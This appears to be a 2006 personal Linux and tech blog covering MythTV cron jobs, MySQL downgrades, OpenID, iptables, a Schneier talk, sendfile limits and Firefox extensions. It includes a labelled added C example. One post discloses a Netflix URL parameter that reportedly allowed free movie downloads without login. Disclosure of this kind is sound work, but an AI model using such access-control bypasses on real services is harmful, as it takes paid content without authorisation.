codeblog code is freedom — patching my itch

May 16, 2006

catching up on Stargate

Filed under: Blogging,Health — kees @ 10:50 pm

I’ve been catching up on Stargate SG-1 ever since Bryce recommended it. I’d been resisting it, but with no more Firefly, Farscape, or StarTreks left to watch, it was inevitable.

At one point during my catch-up, I realized that I was watching 4 separate time-lines of the show. SciFi was showing new episodes on Fridays, a set of 3-in-a-row on Mondays, and a third chronology running Tue, Wed, Thu. On top of this, Fox(?) was playing re-runs on Fridays as well. About 30 episodes in, I totally lost it, and could not keep things straight. (“What? Where’d Daniel Jackson go? Who’s this guy?”)

To my rescue was my ever-faithful to serve as a base check-list for which shows I’d seen already, and the fantastic Stargate Wiki Episode Guide to help me remember which I’d already seen. (They even have full transcripts of the episodes! That’s dedication!)

It looks like very few season 2 episodes have aired, so I will have to turn to either the library or Netflix to fill the gaps. Once SG1 is gone, I will have to switch my daily exercise routine back to Buffy the Vampire Slayer. :)

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

May 12, 2006

sourceforge CVS re-check-out solution

Filed under: Blogging — kees @ 9:54 pm

SourceForge migrated to their new CVS server infrastructure recently (due to a catastrophic disk failure of the old system), and told everyone that they had to re-check-out all their trees:

Hostname for CVS service

This change will require new working copies to be checked out of all
repositories (so control files in the working copy will point to the
right place). We will be updating the instructions we supply, but
instructions that your team has written within documentation, etc. will
need to be updated.

cvs co gaim

would be changed to

cvs co gaim

With 14 projects hosted there, with potentially multiple CVS modules in each, this wasn’t the best way for me to deal with the change. I had relocated several CVS trees at OSDL last year, so I went digging for my command line to do the updates. I was disappointed they didn’t suggest it in their email, so I offered my solution via their Tracker. Someone else (on Cygwin even) confirmed that it worked for them, and SourceForge summarily closed the ticket (hence making it disappear from the Tracker where other people were seeking help). I can find no record of a change made to their documentation. In effect, they just eliminated my help (though they did thank me first).

It would be nice if SourceForge ran some kind of forum or Wiki on their site so people could help each other. I’ll have to remember this for the next Advisory Council.


May 4, 2006

mythtv listing-update time-rotation

Filed under: Multimedia — kees @ 7:33 pm

A few months ago, zap2it’s renewal survey included a set of questions that were not questions, but rather pleas that people move their database updates to a non-standard time. The default install of MythTV has a hard-coded time in the middle of the night to contact the zap2it servers for TV listing updates. Unfortunately, this means zap2it’s servers were (are?) getting crushed on the hour, across 4 time-zones, in the middle of the night.

To solve this little problem in MythTV, I turned off the built-in “mythfilldatabase” execution, and moved to doing it via crontab. zap2it said they had virtually no load during the day-time, so I moved the update to a little after noon, sticking the following in /etc/cron.d/mythtv-backend:

09 12 * * * mythtv mythfilldatabase --quiet

It dawned on me today while messing around with the “at” scheduler that I could actually randomize when during the day the mythfilldatabase runs. If you wanted to run the job anywhere in a 12 hour (720 minute) period after 9am, you could do it this way:

# In a crontab a literal % is turned into a newline, so it has to be escaped;
# $RANDOM is a bash feature, so cron's SHELL must be bash for this to work.
0 9 * * * mythtv echo "mythfilldatabase --quiet" | at now + $(( RANDOM \% 720 )) minutes

(My bash manpage says the low-order bits of $RANDOM are as random as the high-order bits, so this is “safe”. If you don’t trust your version of bash, you could use $(( 720 * RANDOM / 32767 )) instead. IANAMG*, YMMV, OMGPONIES.)

*I Am Not A Math Geek


careful with mysql downgrades

Filed under: Multimedia — kees @ 1:59 am

I ran into a nasty bug while attempting to downgrade a MySQL database. I had been running my MythTV machine on Debian Unstable, but recently reinstalled to Ubuntu. This has the unfortunate consequence of going from MySQL 4.1 to MySQL 4.0. The “mysqldump” option “--compat=mysql40” kind of forgets to include the “auto_increment” flag for table creation. This caused my subsequent MythTV 0.18 to 0.19 upgrade attempt to instantly bomb, since all the INSERTs expecting the PRIMARY KEY to increment as new stuff was inserted … didn’t.

Once I split the dumps into tables (-t) and data (-d) with different “--compat” levels and hand-edited the tables, everything was “fine” again. I actually got the whole system up and on its feet again, with no loss of Stargate SG-1 episodes. ;)

So, now all I have to fight with is Xv on an old S3 card. Looks like new versions of Xorg don’t aim Xv to the right place. And, mysteriously, the S3 card’s Xv implementation lacks the XV_SWITCHCRT attribute, so I can’t just use “xvattr” to fix it, like I do on my laptop. Aaagh.

I wonder if something like the xorg.conf’s Option MonitorLayout “TV,CRT” might help it? I’ll try that tomorrow.


May 3, 2006

fun with OpenID

Filed under: Blogging,Security,Web — kees @ 6:04 pm

While I can’t log into NetFlix or Amazon with OpenID (or other federated login systems), I still wanted to try it out. The goal is to easily write comments on people’s blogs, edit Wiki pages, etc, all without having to keep logging in every time. So far, so good.

First step was to decide between running my own OpenID server or not. I went with “not”, since there really isn’t an installable OpenID server yet (there are only support libraries, it seems). Since I was given a permanent account with LiveJournal for some XSS testing I did for them, I figured I’d just use their stuff. I wanted to use “” as my login everywhere, so I just added two lines to my HTML source:

<link rel="openid.server" href="" />
<link rel="openid.delegate" href="" />

Poof. Done. I used Videntity to verify that it was all working. Nifty stuff.

My only complaint is that it’s not clear how to get an end-to-end secure login. I can log into LiveJournal securely, but the OpenID server they run doesn’t seem to operate over HTTPS. Future study is needed. :)


April 30, 2006

slow debian mirror avoidance

Filed under: Networking — kees @ 8:02 pm

has 4 mirror servers in their DNS round-robin. One of them ( is very slow (25Kb/s) for me. The others are blazing fast, especially (800Kb/s). I’ve gotten sick of having to hit Ctrl-C to abort an apt-get, and then restart it, hoping to get a better server out of the DNS.

Today, I added the following to my machine’s iptables config, so that it will just redirect all attempts from the slow mirror to the fast mirror:

iptables -t nat -A OUTPUT -p tcp -d --destination-port 80 -j DNAT --to-destination

If I wanted to do this for my whole network, I’d just slap this rule on my firewall and change “OUTPUT” to “PREROUTING”.

I love iptables.


April 28, 2006

lvm article

Filed under: General — kees @ 2:14 pm

Bryce wrote a great article on LVM and disk management that I helped do some technical editing on. Hopefully stuff like this will help other people get more comfortable with LVM, and make it less of a dark art. :)


April 26, 2006

smallville, as measured in lana-minutes

Filed under: General — kees @ 7:00 am

I enjoy watching Smallville. I found Lana tiresome almost immediately. Recently, the writers teased us by showing an alternate future where she died. Struck with the possibility of not having to deal with her while watching the show, I became very excited. Then they brought the character back, and I couldn’t bear to continue watching the show. Every minute she’s on the screen is a minute stolen from me through the dark arts of terrible acting. If I didn’t so enjoy the rest of the plots and characters, I could so easily just stop watching. (I am also starting to run low on SG-1 episodes…)

To help combat my annoyance with Lana, I think I’m going to measure her screen-time. I’m going to count every minute that she’s on-screen and not dead, or when the on-screen plot is a direct result of her idiocy. (i.e. Clark complaining about something Lana did.) The goal will be to reach a “perfect episode” Lana-minute score of ZERO.

As a bonus, I figure I should also track Chloevage minutes. I figure Lana and Chloevage timers shouldn’t run if they’re both on screen at the same time — they cancel each other; I am neither frowning nor smiling. The Chloevage-minutes would be a tie-breaker for episodes with nearly the same Lana-minutes value.

Ah, the physics of abstract television analysis.


April 23, 2006

grub, yaird, mdadm, and missing drives

Filed under: General — kees @ 7:54 pm

This is basically a rant. I spent all my energy tracking down the problems, so I never did get things actually fixed. :P

I have my machines configured for software RAID between my primary and secondary drives. I always have. LILO supported this configuration back in RedHat 5.2 days. I’ve been doing RAID1 for a long time now. About a year ago, I changed my preference for boot loaders to GRUB, and just kind of assumed it handled mirroring. Well, much to my surprise, grub totally and completely does not handle mirrored configurations. Even the proclaimed fix didn’t work.

As a result of this “discovery”, I’ve switched back to LILO, which, I think, is a pain in the ass because it doesn’t actually have any filesystem-smarts built into it. (i.e. I have to re-run “lilo” every time I change a kernel or initrd.) I may see if another fix works as expected, but I don’t have a lot of hope considering the device map in the filesystem is the same for both grub drives, which is what causes the problems in the first place. (“Ieee! Where did the other drive go?!”)

So, moving forward, assuming my bootloader works, all kernels from 2.6.13 forward don’t support devfs, and the older initrd tools can’t handle that. Debian invented “yaird”. I had assumed they used the /sys filesystem and did other smart things. As it turns out, it’s fairly brain-dead. I booted without one of my mirrored drives, and yaird totally freaked out. As I discovered while digging through the initrd yaird generated, it just statically builds device nodes, based on what the running system used to look like.

There are two problems with this:

  1. DM devices (LVM, crypto, etc) are dynamically assigned. They may not have the same numbers after rebooting. This is mostly worked around by waiting for stuff to show up in /sys, so I’ll only complain about Ubuntu’s practice of encoding the major/minor numbers for the root device. (e.g. 0xFF00 — my root partition may not always be detected first) I don’t understand this, since the loader handles string-based paths for the root partition. But that’s not the bug I ran into for this rant.
  2. If a device goes missing, yaird assumes this is a bad thing. It has no concept of quorum. It could be argued that it shouldn’t, but in that case, it shouldn’t drop me to a prompt every time a device goes missing. It should only do that in “debug” mode. (I should send my patch for that in.)

While digging to open a Debian Bug report against yaird, I discovered that yaird, while annoyingly dropping me to a prompt (which I can “exit” out of), isn’t the real problem. The real problem is that “mdadm” incorrectly thinks it can’t start up the mirror with only 1 drive. There’s actually a counting bug where it just flat out thinks it needs 2 drives to start. Once I found this, I got pissed, “What? How could this bug exist?”

I proceeded to find the current source for mdadm, so I could write a patch to fix it. Only then did I discover that Debian’s version of mdadm is 5 REVISIONS BEHIND (including a major version jump)! AAAGGGh!

At this point I got in line reporting how old mdadm is, installed a work-around-mdadm patch to my yaird templates, and switched back to LILO. Ugh. And before someone yells “Run Gentoo!”, I checked already. The Gentoo mdadm version is old too. But at least they have a masked ebuild of the modern versions.

I hate choosing between stability and bleeding edge, but I don’t usually complain because I recognize the costs associated with stabilizing new stuff. But, come on, the mdadm 2.x series came out in AUGUST. That’s 8 months ago. I think that’s pretty stable! *sob*

I wish I had enough time to be a Debian maintainer instead of just sitting here and moaning, but hopefully my bug reports will do some good. :)


April 13, 2006

Bruce Schneier on attack trends

Filed under: Blogging,Security — kees @ 9:20 pm

On Wednesday I attended Bruce Schneier‘s short talk about the trends of online attacks. I figure I need to take his talk with at least a small grain of salt. While he has a reputation to maintain, he also works for a security outsourcing company. That in mind, I still like reading his blog, and I enjoyed hearing him talk.

The main take-away from his talk was that attackers are more rarely “hobbyists”, and more commonly criminals. (i.e. there is profit motive rather than an interest in boasting rights.) In the same vein, worms are becoming more sophisticated, quieter, and increasingly effective, while losing their cleverness. (Criminals don’t care if their worm is lame, they don’t care if they ripped off someone else’s worm, they care that their worm is staying undiscovered and is making them money. As a result, whole families of slightly different worms are appearing.)

One thing he said, that I have a hard time believing, and if true is pretty scary, is that cyber-crime profits are now exceeding drug profits. I would love to understand what the sources for that statistic are. Beyond just phishing, beyond worms waiting for you to authenticate to banks before emptying your wallet, there is even small-scale Denial-of-Service extortion. Generally, it’s against places that are themselves on tenuous legal ground, like offshore gambling sites. “If you don’t pay us $X, we’ll DoS you again!” It’s protection money online. Wild.

The market for blackhat exploits is growing. This is reducing the time between vulnerability announcement and exploit usage. Unfortunately, in the Microsoft world, an opposite trend is happening: patch speed is slowing due to their needing to test more and more configurations, staying infinitely backward compatible. At least this has an upside that their patches are generally better and corporations are learning to trust auto-update systems. (And I think this kind of brain-share is actually good for all OS vendors.)

The commoditization (and therefore homogenizing) of hardware and software means that everyone runs the same stuff. Even the criminals. Before, generally only the various corporations had old AS/400 machines and no one really wrote attacks against them. Now stuff runs on PCs.

Overall, the attacks online are becoming increasingly more damaging financially (“criminals are good at what they do”). The volume of attacks come from the open Internet, but the more successful attacks come from inside a private network. More worms are simply waiting for opportunity instead of beating on a network.

While some of the crime organizations have been taken down, there are still large bot networks that are continuing to grow in size even though they have no controller any more. This is truly something out of dystopic sci-fi. I don’t know why, but while I find the idea of full AIs reasonable, and totally non-intelligent systems reasonable, I find half-AI systems really creepy. They just keep doing some semi-smart thing over and over waiting until mommy comes back to tell them to do something else now.

He wound down discussing his worries for the future. He wants people thinking about VoIP security now. (Worms sniff your typing and packets already, soon they can sniff your voice.) He hinted at Digital Restrictions Management without actually saying DRM. (“Who owns your computer?” To which I thought, “I do. This is why Free Software is so important.”)

In closing he talked about security being more about usability than technology. I took that to mean “the Art of security is more about usability than technology.” I can have infinite security by just unplugging something. But that’s not very artful. Towards the goal of successful (artful) security, he wants to see service providers be ultimately liable for the financial damage. He figures this puts the motivations in the right place. It seems like the right thing to me (if credit card companies want to avoid it, it must be good for me) but I suspect there is something hidden deeper that may cause greater harm. I can’t put my finger on it, so for now, I’ll agree. :)

At one point he gave a nice view into his own world, in which he has to go twice a year and disinfect his own mother’s computer of worms. The cobbler’s children’s feet…

The end of the session was a book signing (Counterpane gave out gratis copies of Schneier’s new book “Beyond Fear”). I showed my geek by having brought a copy of “Applied Cryptography” for him to sign too. For which he was geek-prepared, and tossed in a cryptogram. Even though he does this for lots of people (Google told me later), it was fun to see it in my book; I wasn’t expecting it.


April 11, 2006

construction movies

Filed under: Multimedia — kees @ 7:55 pm

From the time-lapse construction webcam I set up with Brian, I built a pair of AVIs. These were made with ffmpeg so they use the FMP4 codec. Windows folks can find ffdshow in a number of places.

Left view movie (31M), set to Delerium’s “Silence” (with Sarah McLachlan).
Right view movie (24M), set to a remix of Everything But the Girl’s “Like the Deserts Miss the Rain”.

I tried to build these movies showing only day-light hours, on work days. A few holidays sneak in, though. (There’s a longer section of a few days where no one shows up for work across Thanksgiving, for example.)

The AVI frame rate is 25fps, with each frame jumping 10 minutes. The effective speed is 14400:1. They span the time from July 26 2005 through January 21 2006. (The right-side camera was added on August 29.)

My least favorite easter egg is where the room-light-shield I taped up to keep room glare off the camera peels off the window and hangs in front of one of the cameras during Christmas and New Year’s vacation (when no one was around to fix it).

My most favorite easter egg is near the latter half when a pile drilling rig is parked in the foreground. Over the course of the day, the hydraulics holding the drill up at an angle bleed out, and the drill slowly pitches forward. I just love it; it’s exactly the kind of event no one notices at the time because it’s happening so slowly. Seen in time-lapse, though, it’s very obvious — it’s the only thing moving at all! :)


April 9, 2006

greasemonkey for RMLS

Filed under: Web — kees @ 8:15 pm

The house-for-sale listings that produces are very detailed, and even include a link to show a map for each house’s address. However, this link goes to MapQuest, which I find infuriatingly annoying to use. I wanted the link to at least go to Google Maps instead. Since I live near Portland, I also wanted to search the fantastic Portland Maps site at the same time. That way I could see lot dimensions, crime statistics, etc.

This was clearly a perfect job for GreaseMonkey. The result, after my usual fights with javascript, is my script to override the RMLS address mapping function.


April 2, 2006

in honor of DST: SW

Filed under: Blogging — kees @ 7:56 am

Since I’ve lost an hour to Daylight Saving Time, I thought I’d record a list of links to Alternate Star Wars Theories.


April 1, 2006

NetFlix movie downloading

Filed under: Multimedia,Vulnerabilities — kees @ 12:22 pm

Netflix accidentally lets you download movies for free. I reported this on March 18th, but they still haven’t replied. It’s been 2 weeks, so I’m posting the details now.

While digging through Netflix’s javascript I found a function named “startDownload“. I was originally just curious about the AJAX responsible for the movie info popup boxes, but this proved much more interesting.

I’m guessing they must be beta-testing this for some accounts because nothing visible through my account ever calls “startDownload“, but I could still use it.

Turns out the function handles a bitrate selection, and then just rewrites the URL a little. You can get the same effect by just adding “&download=avi&br=4” to the end of a movie info URL. For example, this is the URL to get info about Ice Age, and this is the URL to download Ice Age. This even seems to work without being logged in.

I haven’t had time to check if everything in their library is downloadable, but of the 6 or so I tried, they all worked. If anyone finds a cut-off date, let me know.


March 27, 2006

presenting at OSCon 2006

Filed under: Blogging,Multimedia — kees @ 6:43 pm

Woohoo! I got accepted to present at OSCon again! I’m really excited about this one, too — I get to present about something non-work-related. The title of my presentation is “DVR Happiness: Gluing MythTV and TiVo together with Galleon”. Here is my proposed outline:

  1. Intro to DVRs
    • TiVo: have you been under a rock?
    • MythTV: learn all about video standards.
  2. TiVo Gets You A Lot
    • Hacked TiVos can do great things
    • Is your TiVo a tool or a toy?
    • Stock TiVos can do cool stuff too
    • ToGo: move video from TiVo to PC
    • GoBack: move video from PC to TiVo
    • MP3s: streaming from anywhere
    • Image Galleries: beyond just snapshots
  3. Galleon Gets You More
    • Implements the server-side of TiVo features
    • On-the-fly format conversion
  4. MythTV Gets You The Most
    • Making Tivo recordings available to MythTV
    • Format conversion
    • Making MythTV recordings available to TiVo
    • Mounting a MythTV filesystem with FUSE
    • Making your MythTV remote make noises
    • Short-cuts with the Linux IR daemon

EDIT: WordPress pisses me off so very much when it comes to lists, indenting, and code snippets. Some day, I will switch to something that just lets me type in HTML and doesn’t try to “fix” it for me afterwards. *fume*


March 23, 2006

amd64 is okay

Filed under: General — kees @ 8:36 pm

I’m fairly happy with my amd64 box, but it has some bothers. It reminds me of switching from 16bit to 32bit applications back in the day. Since the SATA drivers were busted on every distro I tried to install, I ended up with Debian Unstable — probably because I know how to dance around needing a more recent kernel.

Audio wasn’t working right away, but it looks like ALSA has resolved the issues finally. These fancy new 6-channel chips are silly. Maybe in 5 years I’ll actually have something other than stereo speakers on my computer. :)

Switching to 64bit has really shown me all the non-free software I use, since I can’t run these 32bit-compiles natively anymore:

  • acroread
  • various proprietary A/V codecs (DLLs via MPlayer)
  • Flash plugin
  • Wine

Okay, so Wine and don’t run because of porting issues, but still. There have been two ways to solve these problems:

  • 32bit versions of various libraries
  • chroot to a 32bit environment

Installing 32bit libs is nice, but Debian isn’t smart enough to let me install .i386.deb files along with my .amd64.deb files. There’s got to be a way, but I haven’t figured it out. So, I followed the Ubuntu instructions, and built a 32bit chroot environment. Any time I want to watch something in Flash, I run “bash32” and run Mozilla in there, which has the Flash plugin. Same for OOo, etc. With the mount bindings (e.g. “mount -o bind /home /chroot/sid/home”) it’s like I never left home. Audio even works. Pretty slick solution.


March 22, 2006

debugging firefox extensions

Filed under: Web — kees @ 6:15 pm

After installing my amd64 machine and getting my desktop moved, I noticed that Firefox seemed to be running really slowly. Especially google maps. After Brian showed me the Firefox Hacks book, I decided to try and dig into the cause.

By setting the environment variable “NSPR_LOG_MODULES=all:5” you see damn near everything Firefox is doing while it does it. I noticed that it was stalling every time it processed a new cookie (since I don’t let Google set cookies). So I started removing each of my cookie extensions.

To get myself back to a sane state, I just backed up my Firefox profile:

cp -a ~/.mozilla/firefox/*.default ~/firefox-profile

Then removed one extension, restarted Firefox, etc, until I found the busted one. Turns out “Extended Cookie Manager” was my problem, so I replaced it with “Cookie Button in the status bar”.

Tedious, but, it worked. And for some reason, getting a list of all the Firefox environment variables proves to be very difficult.


March 5, 2006

sci-fi crew

Filed under: Blogging — kees @ 8:30 am

You scored as Moya (Farscape). You are surrounded by muppets. But that is okay because they are your friends and have shown many times that they can be trusted. Now if only you could stop being bothered about wormholes.

Moya (Farscape)
Babylon 5 (Babylon 5)
Bebop (Cowboy Bebop)
Millennium Falcon (Star Wars)
Serenity (Firefly)
SG-1 (Stargate)
Deep Space Nine (Star Trek)
Nebuchadnezzar (The Matrix)
FBI’s X-Files Division (The X-Files)
Enterprise D (Star Trek)
Galactica (Battlestar: Galactica)
Andromeda Ascendant (Andromeda)

Your Ultimate Sci-Fi Profile II: which sci-fi crew would you best fit in? (pics)
created with


January 18, 2006

mecha gone wild

Filed under: Blogging — kees @ 9:28 am

This has got to be the coolest use of an animated GIF ever:

walking mech

Even crazier, in Firefox, if you right-click to “View Image”, the favicon shown in the tab is animated too! I smell code re-use! That kicks ass. I wonder what level of hell I’d burn in if I made the favicon for my site animated.


January 17, 2006

ngsec games

Filed under: Reverse Engineering,Security — kees @ 5:49 pm

Today I was reminded of the NGsec security games site from a DefCon CTF team-mate. (This game was actually used as a prequal for DefCon 10, which I didn’t go to. Ken told me stories about it, though.) I burned through stages 1-9 in about 45 minutes, and then hit stage 10 and was side-tracked learning about encrypted ELF binaries.

There continue to be no useful FOSS binary analyzers for this kind of reverse engineering. gdb just doesn’t even begin to cut it: it was made for (surprise!) debugging programs built by friendly compilers, not doing forensics on decidedly unfriendly, hand-crafted binaries. If Paul Graham and Richard Hamming are to be believed:

  1. What are the most important problems in your field?
  2. Are you working on one of them?
  3. Why not?

I should be writing a static binary analyzer. And a dynamic one too. GPL IDApro replacement. Yeow.


January 16, 2006

and sendfile

Filed under:,Networking,Security — kees @ 4:50 pm

The “sendfile” system call is a way to send file contents directly out to a network socket. This saves time in userspace (so it doesn’t have to copy buffer contents around), and was one of the reasons I upgraded‘s Apache to version 2.x at the end of 2003 (because version 1.x doesn’t have sendfile support). A few weeks ago, one of the other admins discovered that files greater than 2G were not being delivered by Apache.

I had a lot of fun tracking down the issue. The “amount to send” argument in the sendfile call is a “size_t”, which is basically an “unsigned long”. Having a 2G limit didn’t make sense, since even with 32 bits, that should be a 4G limit. However, the servers are both 64bit, so as it turns out, “size_t” is a full 64 bits. After writing a quick test, I was able to verify that it was, indeed, a 31 bit limit on both 64 bit and 32 bit kernels. Peter Anvin took it from here, and tracked down the origin of the problem: filesystem operations greater than 31 bits in offset were being rejected deep in the kernel. He suggested truncating the request instead of returning a failure.

Seems as though Linus decided to limit the size of filesystem calls to make sure there aren’t security problems (signed vs unsigned overflows) in the various filesystem drivers, while people using the Linux kernel migrate more from 32bit to 64bit systems. Personally, I don’t agree with this, but from a practical stand-point, it hardly makes a difference. Instead of sending all 4G out the pipe and returning to user space, it just returns twice, sending 2G per call.

This should be fixed in 2.6.16. Until then, we could patch Apache to keep its offset request under 31 bits, but we’ll probably just tell people to use FTP, since vsftpd doesn’t use sendfile yet.
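To show what a caller has to do when sendfile() hands back fewer bytes than it asked for (as the 31-bit cap described above makes it do), here is an added example; it is not code from the original post or from Apache. It loops on sendfile(2) until the requested count is out, with a constructed per-call cap standing in for the kernel-side limit, and checks itself with a temp-file round trip. It assumes Linux (using a regular file as the out_fd needs 2.6.33 or later).

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/sendfile.h>
#include <unistd.h>

/* Number of sendfile() invocations made by the last sendfile_all() run;
 * kept only so the round-trip check below can show the loop iterating. */
static long sendfile_calls;

/* Send `count` bytes of in_fd, starting at *offset, to out_fd, calling
 * sendfile() as many times as it takes. `max_chunk` caps the count handed
 * to each call (0 = no cap); it is a constructed stand-in for the kernel's
 * own per-call limit so the loop can be exercised on a small file.
 * sendfile() itself advances *offset. Returns bytes sent, or -1 with errno
 * set. Blocking descriptors are assumed (no poll() on EAGAIN). */
ssize_t sendfile_all(int out_fd, int in_fd, off_t *offset, size_t count,
                     size_t max_chunk)
{
    size_t sent = 0;

    sendfile_calls = 0;
    while (sent < count) {
        size_t want = count - sent;
        if (max_chunk != 0 && want > max_chunk)
            want = max_chunk;

        ssize_t n = sendfile(out_fd, in_fd, offset, want);
        sendfile_calls++;
        if (n < 0) {
            if (errno == EINTR)
                continue;          /* interrupted by a signal: just retry */
            return -1;             /* real error (EPIPE, EINVAL, ...) */
        }
        if (n == 0)
            break;                 /* in_fd hit EOF before `count` bytes */
        sent += (size_t)n;         /* short transfer: loop for the rest */
    }
    return (ssize_t)sent;
}

/* Self-contained check: fill an unlinked temp file with `size` bytes of a
 * repeating pattern, copy it with sendfile_all() in `chunk`-byte pieces into
 * a second temp file, and compare. Returns the number of sendfile() calls
 * that were needed on success, -1 on any failure or mismatch. */
long sendfile_roundtrip(size_t size, size_t chunk)
{
    char in_path[] = "/tmp/sf-in-XXXXXX";    /* constructed scratch files */
    char out_path[] = "/tmp/sf-out-XXXXXX";
    char *src = NULL, *dst = NULL;
    long result = -1;
    off_t off = 0;

    int in_fd = mkstemp(in_path);
    if (in_fd >= 0)
        unlink(in_path);
    int out_fd = mkstemp(out_path);
    if (out_fd >= 0)
        unlink(out_path);
    if (in_fd < 0 || out_fd < 0)
        goto out;

    src = malloc(size);
    dst = malloc(size);
    if (!src || !dst)
        goto out;
    for (size_t i = 0; i < size; i++)
        src[i] = (char)(i % 251);
    if (write(in_fd, src, size) != (ssize_t)size)
        goto out;

    ssize_t n = sendfile_all(out_fd, in_fd, &off, size, chunk);
    if (n != (ssize_t)size || off != (off_t)size)
        goto out;                  /* short or failed copy */
    if (pread(out_fd, dst, size, 0) != (ssize_t)size)
        goto out;
    if (memcmp(src, dst, size) != 0)
        goto out;
    result = sendfile_calls;

out:
    free(src);
    free(dst);
    if (in_fd >= 0)
        close(in_fd);
    if (out_fd >= 0)
        close(out_fd);
    return result;
}

int main(void)
{
    /* 5000 bytes in 1000-byte pieces: the copy only completes because the
     * loop keeps going after each short return. */
    printf("chunked copy took %ld sendfile() calls\n",
           sendfile_roundtrip(5000, 1000));
    return 0;
}
```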


January 14, 2006

open source as prior art

Filed under: General — kees @ 6:41 pm

I’m involved in the Open Source as Prior Art initiative. The goal being to more readily make FOSS available as prior art for the US Patent and Trade Office to use while examining software patent applications, reducing the number of poorly issued software patents.

This is a rather touchy area given the fact that most FOSS proponents (myself included) would rather see software patents go away completely. However, in the US, this is not likely to happen any time soon, since it’s not up to the USPTO, it’s up to the US Legislature; the USPTO has to implement the law, which puts them in a bind since they’re not very successful right now at finding prior art (and the laws surrounding prior art discovery aren’t that helpful either). In my opinion, if the USPTO could reliably find prior art, they would start rejecting almost all software patent applications, and the futility of software patenting would become clear to those that didn’t already recognize it. If I’m wrong, then I’d hope that with the very few patents issued, innovation really would return to the system.

Groklaw has already discussed the OSaPA project and the overall “Patent Quality Improvement” initiatives announced by the USPTO. I’ve read these and several other articles, each ranging from praise to scepticism, looking for more thoughts on the subject to help me shape my opinions.

One of the most sceptical was written by Greg Aharonian from the Internet Patent News Service (which ironically has no online archives for me to link to). His scepticism is mostly aimed at the USPTO and IBM, and not directly at the various initiatives, past or present. His fundamental point is that the USPTO doesn’t appear to have managed to use the (voluminous) resources it already has at its fingertips, so why would adding more help the situation? This approach didn’t work in the past, and there’s no indication that anything has changed in the USPTO to make it a success this time around.

I don’t have the historical background to know if it’s a fair assessment, but I enjoyed his analogy:

“[…] IBM is Lucy, PTO management is Charley [sic] Brown, and these fake initiatives to improve patent quality are the football that the PTO keeps on trying to kick, only to be fooled again and again.”

One thing I think he may have missed, though, was that the OSaPA initiative contains another player. The initiative itself may again be the football, and the USPTO and IBM may again be playing, just as with prior (seemingly failed) initiatives. However, this time, the FOSS community is involved. I like to think that in Greg’s analogy, the FOSS community is Charles Schulz. We can draw any damn comic we want, and we’ll still be around after the initiatives, IBM, and the USPTO are long forgotten. The FOSS community is on the multi-hundred year plan, the same as any other sustainable cultural plan. If Greg’s predictions come to pass, and it really does turn out to be a waste of time, I still have faith that it’ll only be the USPTO (and, unfortunately, the US) getting hurt. To borrow from John Gilmore, FOSS will treat this as a defect, and route around it.

Regardless of history, I sincerely hope the USPTO takes this novel chance to harness the power of the FOSS community. We’re interested in helping them solve their problems, and if the USPTO drops the ball, it’s unlikely the FOSS community will ever look back.

© 2006, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

January 7, 2006

cheap auto-rotoscoping

Filed under: Multimedia — kees @ 2:35 pm

In the back of my head, I’ve been wondering about various ways I could use my $20 camcorder. Making cheap movie shorts, like SNL’s “Lazy Sunday” come to mind. There are no fancy zooms or special effects. It’s all editing and audio. Bryce kicked some ideas my way, most of which include using the dogs and/or cats as the primary actors (I can pay them in kibble). He also suggested renewing my father’s Rottweiler Camcorder with a much smaller device. I think the images would be mostly obscured by my dog’s chin. We’ll see. I also worry it may suffer from being summarily ingested.

While playing Name that Tune 80s DVD Edition, the a-ha video for “Take On Me” came on. The rotoscoping used to create the animated parts made me think of Inkscape‘s autotracing function, and I leapt up to go investigate the possibilities.

So far, I’ve played with two styles. One leaves the autotraced fill areas (which makes a video look like a really freaky cartoon), and one reduces the fill opacity and adds line density so it looks more like a regular outlined cartoon. That one tends to be distracting, though, since the edges keep jumping all over the place.

The autorotoscope script requires mplayer, ImageMagick, autotrace, and ffmpeg.

Here are the results:

These AVIs use xvid for their video codec. If you don’t already have it, you can get them from here.

© 2006 – 2015, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

January 3, 2006

my firefox extensions

Filed under: Web — kees @ 11:50 pm

I’ve gotten all my Firefox extensions straightened out again since the 1.5 shake-up. Now that it’s sane, I wanted to report what I’m using so I’ll remember for the future, and so I can go look somewhere if I’m on my laptop or some other machine and I can’t remember which extension I was looking for.

Also at least one other person has asked me what extensions I’m using, so maybe others would be interested. I used the following to get a human-readable list of my extensions:

# Dump name/version/description of every installed extension (type 2) from extensions.rdf
egrep ':(version|name|description|type)' ~/.mozilla/firefox/*.default/extensions.rdf | \
perl -pe 'print "\n" if (/:version/); s/^[^=]+="//; s/"$//;' | \
(read EMPTY; while read VER; do \
  read NAME; read DESC; read TYPE; read EMPTY; \
  if echo "$TYPE" | grep '>2<' >/dev/null; then \
    echo "$NAME $VER"; echo "$DESC"; echo ""; \
  fi; \
done)

I bet there is an elegant XPath command to extract this directly with a single “perl” execution, but, uhm, I’m not an XML expert. :)

Almost all of these extensions were gotten from the Firefox extensions list:

  • BugMeNot (0.9) Bypass compulsory web registration with the context menu via
  • Tabbrowser Preferences ( Enhances control over some aspects of tabbed browsing.
  • Modify Headers (0.5.1) Add, modify and filter http request headers
  • View Rendered Source Chart (1.2.03) Creates a Colorful Chart of a Webpage’s Rendered Source
  • Gcache (0.2.1) Displays a google cached version of the webpage.
  • Adblock ( Filters ads from web-pages
  • Word Count (0.3) Counts the number of words in selected text.
  • Allow Right-Click (0.3) Defeats web sites’ right-click prevention scripts.
  • JavaScript Options (1.2.2) Provides advanced JavaScript options for Firefox.
  • User Agent Switcher (0.6.6) Adds a menu and a toolbar button to switch the user agent of the browser.
  • Live HTTP Headers (0.11) View HTTP headers of a page and while browsing.
  • Download Manager Tweak (0.7.1) A modification of the Firefox download manager that changes its appearance and allows it to be opened in a separate window, a new tab, or the sidebar.
  • View Cookies (1.5) View cookies of the current web page.
  • udtranslate (0.0.7) UDTranslate: a zombie translation utility for Urban Dead
  • Stop-or-Reload Button (0.2) Turns the stop and reload buttons into a single one. When you can stop, you have a Stop button, otherwise you have a Reload button. (Like in Safari)
  • QuickJava (0.4.1) Allows quick enable and disable of Java and Javascript from statusbar.
  • Flashblock (1.5) Replaces Flash objects with a button you can click to view them.
  • Greasemonkey (0.6.4) A User Script Manager for Firefox
  • Fasterfox (1.0.1) Performance and network tweaks for Firefox.
